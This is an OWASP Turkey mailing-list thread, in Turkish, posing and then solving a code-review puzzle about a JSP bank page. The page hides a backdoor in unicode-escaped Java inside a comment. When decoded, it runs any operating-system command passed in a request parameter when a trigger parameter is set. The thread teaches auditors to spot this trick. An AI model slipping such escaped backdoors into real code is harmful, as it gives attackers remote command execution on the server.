<div> </div>
<div>digerlerine daha gore daha ilgi ceker dedim ama...  :)) cekmedi</div>
<div> </div>
<div>cevap &quot;herkes developer&#39;lara guveniyor ama uretimin canina okuyabilirler&quot; mantigi ile yazilmis bir backdoor. Java belirli bir formatta (\uxxxx) unicode karakterler ile kod yazilmasina imkan taniyor. Yani butun identifier, keyword, operator v.b.&#39;lerin ascii olmasina gerek yok. (C# icin ise boyle bir kisitlama var yani keyword ve operator&#39;ler icin mesela sadece ascii karakterler kullanilabiliyor.). Kisacasi verdigim JSP icerisindeki unicode formatinda yazilan bolumu, basina ve sonuna &#39; karakteri koyduktan sonra </div>

<div> </div>
<div><a href="http://www.webguvenligi.org/ipacker/ipacker.html">http://www.webguvenligi.org/ipacker/ipacker.html</a></div>
<div> </div>
<div>uygulamasinin INPUT bolumune koyup EVAL TO OUTPUT butonuna basarsaniz, aslinda developer&#39;in nasil bir backdoor yazdigini gorebilirsiniz. Ortaya cikan parca, multiline comment bolumunu kapatip, asil backdoor kodunu yazip, daha sonra tekrar multiline comment bolumunu aciyor (ki &quot;syntax error&quot; almayalim, ayni sqli, ldapi gibi).</div>

<div> </div>
<div>Bu sekilde ciplak gozle bakan veya regex ile audit yapmaya calisan bir denetimcinin isi zorlasiyor.<br><br>bedirhan</div>
<div> </div>
<div class="gmail_quote">18 Ekim 2009 21:05 tarihinde Bedirhan Urgun <span dir="ltr">&lt;<a href="mailto:bedirhanurgun@gmail.com">bedirhanurgun@gmail.com</a>&gt;</span> yazdı:<br>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">
<div> </div>
<div>Bu kez eglenceli bir ariza var :) Ise farkli bir perspektiften bakmayi gerektiriyor. Bir JSP sayfasi...</div>
<div> </div>
<div>bedirhan</div>
<div> </div>
<div>Arizayi Bul #4</div>
<div>--------------------</div>
<div><br>&lt;<a href="mailto:%25@page" target="_blank">%@page</a> contentType=&quot;text/html&quot; pageEncoding=&quot;UTF-8&quot;%&gt;<br>&lt;!DOCTYPE HTML PUBLIC &quot;-//W3C//DTD HTML 4.01 Transitional//EN&quot;<br>   &quot;<a href="http://www.w3.org/TR/html4/loose.dtd" target="_blank">http://www.w3.org/TR/html4/loose.dtd</a>&quot;&gt;</div>

<div>&lt;html&gt;<br>    &lt;head&gt;<br>        &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=UTF-8&quot;&gt;<br>        &lt;title&gt;BankHorizon Welcome Page&lt;/title&gt;<br>        &lt;link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; href=&quot;style.css&quot; /&gt;<br>
    &lt;/head&gt;<br>    &lt;body&gt;<br>        &lt;% /* Include the header page */ %&gt;<br>        &lt;jsp:include page=&quot;header.jsp&quot; /&gt;<br>        &lt;% /* Include the menu page */ %&gt;<br>        &lt;jsp:include page=&quot;menu.jsp&quot; /&gt;<br>
        &lt;% /* Include the footer menu left page */ %&gt;<br>        &lt;jsp:include page=&quot;footer_menu_left.jsp&quot; /&gt;<br>        &lt;h2&gt;&lt;/h2&gt;<br>        &lt;jsp:include page=&quot;data_validation.jsp&quot; /&gt;<br>
        &lt;%<br>            /************************************COMMENT BEGIN************************************** </div>
<div>           This is unicode that will be used for data validation<br>            \u002a\u002f\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u003d\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0061\u0072\u006b\u0061\u006b\u0061\u0070\u0069\u0022\u0029\u003b\u0020\u0069\u0066\u0020\u0028\u0020\u0073\u0021\u003d\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0073\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0020\u0022\u0061\u0063\u0069\u006b\u0022\u0020\u0029\u0020\u0029\u0020\u007b\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0020\u0022\u006b\u006f\u006d\u0075\u0074\u0022\u0020\u0029\u0020\u0029\u003b\u0020\u007d\u002f\u002a<br>
            *************************************COMMENT END***********************************/     <br>            String lang = request.getParameter(&quot;language&quot;);<br>            // use the unicode above to validate the data<br>
            validateUnicode(lang);                                <br>        %&gt;<br>        &lt;br/&gt;<br>        &lt;% /* Include the footer bottom page */ %&gt;<br>        &lt;jsp:include page=&quot;footer_bottom.jsp&quot; /&gt;<br>
    &lt;/body&gt;<br>&lt;/html&gt;<br></div></blockquote></div><br><br clear="all">
<div></div><br>-- <br>Bedirhan Urgun<br><a href="http://www.webguvenligi.org">http://www.webguvenligi.org</a><br><a href="http://www.owasp.org/index.php/Turkey">http://www.owasp.org/index.php/Turkey</a><br><br>Türkçe Web Uygulama Güvenliği E-Posta Listesine üye olmak için: <br>
<a href="https://lists.owasp.org/mailman/listinfo/owasp-turkey">https://lists.owasp.org/mailman/listinfo/owasp-turkey</a><br>